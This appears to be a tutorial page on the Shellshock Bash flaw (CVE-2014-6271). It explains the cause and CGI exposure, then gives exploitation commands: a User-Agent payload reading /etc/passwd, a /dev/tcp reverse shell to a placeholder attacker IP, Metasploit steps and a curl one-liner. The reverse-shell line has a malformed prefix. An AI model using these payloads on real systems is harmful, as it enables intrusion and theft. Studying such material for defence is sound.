CVE-2014-6271: Shellshock
Shellshock (CVE-2014-6271) refers to a family of vulnerabilities found in the Bash shell, dating back to version 1.3. Discovered by Stéphane Chazelas on September 12, 2014, and made public on September 24, 2014, it allows attackers to remotely execute arbitrary commands by exploiting Bash. Through this, attackers can potentially gain remote access to systems via a reverse shell. Bash, a widely used shell in the *Nix environment and part of the GNU Project, is the default shell for many Linux distributions.
Why the Vulnerability Occurs
The Shellshock vulnerability occurs due to a flaw in Bash where it mistakenly executes commands following a specific character sequence: () { :; };
. This issue arises from how Bash handles environment variable function declarations. When an environment variable is passed to Bash, if it contains this sequence, Bash interprets it as a function, but instead of stopping at the function's definition, it continues to execute any additional commands.
env x='() { :;}; echo Vulnerable' bash -c "echo Test"
In this case, Bash should treat x
as a harmless function, but due to the vulnerability, it executes the echo Vulnerable
command.
This flaw only impacts Linux systems, as Windows doesn't use Bash, being a non-*Nix OS. Specifically, Apache web servers running CGI scripts (.sh scripts) are vulnerable because CGI scripts can pass environment variables to the Bash shell, potentially allowing attackers to exploit the system by executing arbitrary commands.
CGI (Common Gateway Interface) allows Apache to execute commands on the server and send the output back to the client, making systems using CGI scripts and Bash susceptible to remote exploitation.
Payload: The payload
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
is injected into theUser-Agent
HTTP header. This header is passed to the CGI script by the web server in the form of an environment variable.Bash Function Exporting: The vulnerability stems from how Bash exports functions from parent to child shells using environment variables. Any variable beginning with
() {
is parsed by Bash as a function, which could lead to arbitrary command execution.Exploitation: If the CGI script calls Bash or executes commands via system calls (e.g.,
system
,popen
), the environment variables, includingHTTP_USER_AGENT
, are passed to Bash. Bash processes the function-like string() {
, triggering the execution of commands like/bin/bash -c 'cat /etc/passwd'
.Vulnerable Systems: Systems running Bash-based CGI scripts are highly vulnerable, and even non-Bash scripts can be vulnerable if they invoke Bash through system calls. Attackers can execute arbitrary commands on the server by sending malicious headers.
Recon and Exploitation: The vulnerability can be used for recon (e.g., running
id
,ps aux
, or listing files) and data exfiltration by executing system commands via Bash.
Exploitation
To exploit this vulnerability, you need to find an input vector or script that interacts with Bash. On an Apache web server, any accessible CGI script can be used for this. When a CGI script runs, the web server starts a new process and executes the script using Bash.
This vulnerability can be exploited either manually or automatically using the MSF exploit module.
Vulnerability Assessment
nmap -sV [IP]
nmap -sV --script http-shellshock --script-args "http-shellshock.uri=/uri-to.cgi" [IP]
# find cgi based scripts ## important
curl -X GET [DOMAIN] | grep .\.cgi
w/ Burp (Manual)
# intercept the CGI
# inject in user-agent
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
# Reverse Shell
# listening
nc -lvnp 1234
User-Agent: () {:'}; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/[attack-ip]/[1234] 0>&1'
# Send this an you will get a reverse shell
w/ Metasploit
msfconsole -q
search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set RHOSTS [TARGET IP]
set TARGETURI [PATH-TO-CGI]
exploit
One Liner
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable
The user-agent
header is used as an injection point because it is passed by the web server to Bash as an environment variable in a vulnerable CGI setup, allowing the attacker to exploit the Shellshock vulnerability and execute arbitrary commands.
Discussion
The Shellshock vulnerability stems from a feature in Bash that allows exporting function definitions from parent to child shells via environment variables. This feature misinterprets specially formatted environment variables starting with () {
, allowing arbitrary code execution.
Bash's interaction with web servers (like Apache) can expose it to untrusted HTTP headers (e.g., User-Agent
, Cookie
). If an attacker sends a crafted HTTP header starting with () {
, Bash may execute arbitrary commands, leading to remote code execution (RCE).
Other Exploitation Reference
Last updated